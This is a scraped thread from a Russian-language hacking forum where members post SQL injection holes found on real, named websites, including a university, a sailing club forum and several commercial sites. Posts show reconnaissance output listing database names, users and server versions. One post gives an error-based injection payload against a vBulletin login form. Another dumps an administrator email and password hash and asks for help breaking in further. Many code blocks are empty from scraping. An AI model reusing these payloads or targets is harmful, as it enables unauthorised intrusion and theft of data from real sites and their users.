![]() |
Постим сюда найденные SQL инъекции. Прежде, чем запостить, проверьте, не выкладывалась ли SQLi ранее:
Код:
Code:ВНИМАНИЕ !!! Все инъекции заключаем в тег [ CODE ] [ / CODE ], ни каких [ URL ] [ / URL ] быть не должно. Правила этой темы:
|
Скуля с выводом в адресной строке
Код:
Code: |
Код:
Code: |
Код:
Code: |
Код:
Code: |
Код:
Code:5.1.73 CPOSI Код:
Code:ruboohran_riba@192.168.1.28 5.5.27-log ruboohran_riba |
Код:
Code: |
Код:
Code: |
Код:
Code:8k hosts/day кому интересно повоевать с waf... хотя faza ужо замочил... Код:
Code: |
Цитата:
Код:
Code: |
Цитата:
База: invest-expert Таблицы: table_article table_banner table_coment table_fotos table_kategorie table_menue table_news table_produkt table_projects table_projects_archive table_text_blocks table_texte table_video |
Код:
Code: |
Код:
Code: |
Код HTML:
HTML:@@version = 5.1.67-log Alexa = 2,645 |
Код:
Code:version() =5.5.43-37.2-log Alexa = 15,582 Код:
Code:version() = 5.5.18 |
http://www.sangean.com/image/LOGO/SANGEAN_LOGO_RED.gif
Цитата:
|
ПР7
Код:
Code:Код:
Code: |
нет префикса же
Код:
Code: |
Код:
Code:У сайта localwineevents.com, база "lwe". Которая находится рядом / alexa 163,137 |
Код:
Code:SQL Server version: 2005 Database name: education_3 System user: cso_user Server name: CSO-ELDB |
Выжимал "максимум" с error based )) от потенциальной уязвимости до начала дампа за ~5 запросов))
Код:
Code:Код:
Code:Код:
Code:Код:
Code:Код:
Code:Код:
Code:Код:
Code:Код:
Code: |
Код:
Code:.SpoilerTarget" type="button">Spoiler: POST redirect=http%3A%2F%2Fsbo.sailboatowners.com%2Find ex.php%3Foption%3Dcom_content%26task%3Dview%26id%3 D30%26Itemid%3D64&vb_login_username=asfasf'or(Extr actValue(1,concat(0x3a,(select+user()))))='1&vb_lo gin_password=asfasf&cookieuser=1&image.x=0&image.y =0&s=&do=login&vb_login_md5password=0a040ec34abbfb 7f3030345244a913c9&vb_login_md5password_utf=0a040e c34abbfb7f3030345244a913c9 Интегрированый вб в жумлу, везде попрятаны админки и т.п, но все ищется и льется . Мб кому интересно будет попробовать |
Код:
Code: |
КАМЧАТСКИЙ НАУЧНЫЙ ЦЕНТР Код:
Code:5.5.30-log |
SQLi:
Код:
Code: |
http://sanpid.com/images/logo_vs.png
Код:
Code: |
SQLi:
Код:
Code: |
Код:
Code:error-based hostname: 'AY12063001214105c7538' 'root'@'127.0.0.1' Nginx, PHP 5.4.37, MySQL >= 5.0.0 BD list: alexa icpdb information_schema mysql performance_schema test tour2013 whoisdb xj_cn_2014 |
Код:
Code:error based PHP 5.3.3, Nginx, MySQL >= 5.0.0 DBA: True hostname: 'hostname.change.me' ''@'hostname.change.me' ''@'localhost' 'root'@'127.0.0.1' 'root'@'hostname.change.me' 'root'@'localhost' DB list: information_schema megom mysql scorenews test wowza wowza2 wowza2_b1 |
cashbackmonitor.comтрафф 430ксравнение шопов
Код:
Code:Код:
AND boolean-based blind - WHERE or HAVING clauseweb server operating system: Linux Red Hat Enterprise 6 (Santiago) web application technology: PHP 5.3.3, Apache 2.2.15 back-end DBMS: MySQL >= 5.0.0 available databases [3]: [*] CashbackMonitor [*] information_schema [*] test ------------------------------------------------------------- sydney.edu.au трафф 2.2kк Код:
Code:Код:
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clauseweb server operating system: Linux Red Hat Enterprise 5 (Tikanga) web application technology: Apache 2.2.3, PHP 5.1.6 back-end DBMS: MySQL >= 5.0.0 available databases [266]: Код:
Code:[*] acaornКод:
[*] acaorn_wikidb[*] adri[*] anzacdb[*] appan[*] brainprofiling[*] cancer_sphider[*] cancerlearning[*] cancerlearning_tw[*] cards[*] cera[*] cl_resources[*] cl_surveys[*] cl_tw[*] clphpbb[*] ctc[*] ctctest[*] database[*] drh[*] elgg[*] emergency[*] eventsdb_dent[*] ex_allprofiles[*] ex_bdent[*] ex_bmri[*] ex_boh[*] ex_bond[*] ex_bond-post-upgrade[*] ex_bond_2005dev[*] ex_bond_after_upgrade[*] ex_bond_stage3-4[*] ex_bond_stage3_4[*] ex_bosch[*] ex_boschtest[*] ex_cirus[*] ex_cmsapitest[*] ex_cmsapitestreprox[*] ex_ctc[*] ex_dentistry[*] ex_devhealth[*] ex_global_health[*] ex_health[*] ex_kolling[*] ex_kollingfoundation[*] ex_medsci[*] ex_ncsc[*] ex_pharmacology[*] ex_pharmacy[*] ex_pharmold[*] ex_physiology[*] ex_proxyacaorn[*] ex_proxyaddiction[*] ex_proxyalumni[*] ex_proxyanatomy[*] ex_proxyapnet[*] ex_proxybmri[*] ex_proxybosch[*] ex_proxybsim[*] ex_proxycancerresearch[*] ex_proxycentral[*] ex_proxychw[*] ex_proxyconcord[*] ex_proxycoo[*] ex_proxycoppleson[*] ex_proxycpah[*] ex_proxydiabetes[*] ex_proxydrh[*] ex_proxyeye[*] ex_proxyfmrc[*] ex_proxyforensic[*] ex_proxygeneralpractice[*] ex_proxygenetic[*] ex_proxyglobalhealth[*] ex_proxyhealth[*] ex_proxyhocmai[*] ex_proxyimaging[*] ex_proxymeddiscipline[*] ex_proxymedfac[*] ex_proxymedfacfull[*] ex_proxymedfound[*] ex_proxymedicalfoundation[*] ex_proxymedicalhumanities[*] ex_proxymedsci[*] ex_proxymuseumtest[*] ex_proxynepean[*] ex_proxynmrf[*] ex_proxynorthern[*] ex_proxynrf[*] ex_proxyobsgynneo[*] ex_proxyome[*] ex_proxyopme[*] ex_proxypathology[*] ex_proxypharmacology[*] ex_proxyphysiology[*] ex_proxypmri[*] ex_proxypoche[*] ex_proxyprofiles[*] ex_proxyproteomics[*] ex_proxypsych[*] ex_proxyresearchteams[*] ex_proxyrural[*] ex_proxyseib[*] ex_proxystirc[*] ex_proxysurgery[*] ex_proxyvelim[*] ex_proxyvideoconf[*] ex_proxywestern[*] ex_proxywestmead[*] fhbc[*] ht_-v[*] ht_acaorn[*] ht_acaorntest[*] ht_addiction[*] ht_addictiontest[*] ht_agingbonetest[*] ht_anaes[*] ht_anatomytest[*] ht_apnet[*] ht_apnettest[*] ht_avit[*] ht_avittest[*] ht_bdent[*] ht_bmri[*] ht_bmritest[*] ht_bosch[*] ht_bosch_old[*] ht_bsim[*] ht_bsimtest[*] ht_cancerlearning[*] ht_cancerresearch[*] ht_cancerresearchtest[*] ht_central[*] ht_centraltest[*] ht_cochrane-renal[*] ht_concord[*] ht_concordtest[*] ht_cootest[*] ht_coppleson[*] ht_cpahtest[*] ht_ctc[*] ht_dentistry[*] ht_dentistrytest[*] ht_dermatology[*] ht_dermatologytest[*] ht_drh[*] ht_drhtest[*] ht_exambank[*] ht_forensic[*] ht_forensictest[*] ht_genetic[*] ht_genetictest[*] ht_globalhealthtest[*] ht_gmp[*] ht_gp[*] ht_gptest[*] ht_health[*] ht_healthbook[*] ht_healthbooktest[*] ht_healthtest[*] ht_hocmai[*] ht_hocmaitest[*] ht_imagingtest[*] ht_jira[*] ht_jmo[*] ht_kidsresearch[*] ht_kidsresearchtest[*] ht_kolling[*] ht_kollingtest[*] ht_localhost[*] ht_medfac[*] ht_medfactest[*] ht_medicalfoundation[*] ht_medicalfoundationtest[*] ht_medicalhumanities[*] ht_medicalhumanitiestest[*] ht_medicine[*] ht_medicinetest[*] ht_medsci[*] ht_medscitest[*] ht_mga[*] ht_mgatest[*] ht_nbrc[*] ht_nbrctest[*] ht_ncirs[*] ht_ncirstest[*] ht_ncsc[*] ht_nepean[*] ht_nepeantest[*] ht_neurologicalsigns[*] ht_northern[*] ht_northerntest[*] ht_nrf[*] ht_nrftest[*] ht_obsgynneo[*] ht_obsgynneotest[*] ht_ome[*] ht_ometest[*] ht_opme[*] ht_opmetest[*] ht_ovarian[*] ht_paediatrics[*] ht_paediatricstest[*] ht_pathologytest[*] ht_pharmacologytest[*] ht_physiology[*] ht_physiologytest[*] ht_poche[*] ht_pochetest[*] ht_psych[*] ht_psychtest[*] ht_pubhealth[*] ht_rural[*] ht_ruraltest[*] ht_scssc[*] ht_scssctest[*] ht_smokecheck[*] ht_smokechecktest[*] ht_stirc[*] ht_stirctest[*] ht_surgery[*] ht_surgerytest[*] ht_velim[*] ht_velimtest[*] ht_western[*] ht_westerntest[*] htcheck[*] infdisimmunologytest[*] information_schema[*] kolling[*] kollingaccess[*] kollinglive[*] limesurvey[*] limesurvey2[*] medicaldeanstestwp[*] medicaldeanswp[*] medsoc[*] moodle[*] moodle_cancer[*] mysql[*] nbcc[*] neurosigns[*] nmrf[*] orsee[*] pathologytest[*] pgau[*] phpesp[*] pmri[*] pmritest[*] proceduresmanual[*] publichealth[*] rehab[*] simrob_obs[*] ss[*] surgsoc[*] test[*] vmaillogin[*] wikibmri[*] wikicompass[*] wikidb[*] wikidevteam[*] wikifacmuseumtest[*] wikimedadminpedia[*] wikimediabank[*] wikiorrtmanual[*] wikioverseascahpedia[*] wpmysql |
Код:
Code:error based Apache 2.4.10;MySQL >= 5.0.0 Database: filmresearch_db [6 tables] +-----------------+ | bibliography | | biography | | censor_appeal | | censor_decision | | censor_film | | film | +-----------------+ Код:
Code:error based PHP 5.3.29, Apache 2;MySQL >= 5.0.0 available databases [2]: [*] bges [*] information_schema |
Код:
Code:5.0.51a-24+lenny5-log; cemetery |
Код:
Code: |
ASP, MS-SQL
Тип атаки: Convert INT ODBC Error Код:
Code:Код:
Code:Код:
Code:Код:
Code:http://i11.pixs.ru/storage/7/3/4/dum...1_17973734.png |
PR7
Код:
Code: |
Код:
Code:Код:
Code: |
Еще...
Вывод в алерте Код:
Code: |
ВНИМАНИЕ !!! Все инъекции заключаем в тег [COLOR="rgb(128, 255, 0)"][ CODE ] [ / CODE ][/COLOR], ни каких [COLOR="rgb(255, 0, 0)"][ URL ] [ / URL ][/COLOR] быть не должно. Инъекции в POST выкладываем тоже в [ CODE ] [ /CODE ] Код:
Code: |
Код:
Code:user : tv3_readonly@localhost database: tv3 |
Привет все!
Дырка есть базу выдает но там joomla 3.3.1 хеш с солью высыпает И фильтр не пропускает логин админа((( Код:
Code:Я через софт Havij v1.16 скачал базу Код:
Code:povar.admin@gmail.com $2y$10$C8P2iexVqWIKqMUmxhOpCeCTsx9MwInyzBOwShbI/VeDdR47XEvzO Залить не получилось(( не нашел пути Кто сможет раскопать отпишите в личку (Как удалось?) P.S. на сервере фильтрация на количество запросов в минуту! Так что не спишите))) |
| Время: 14:53 |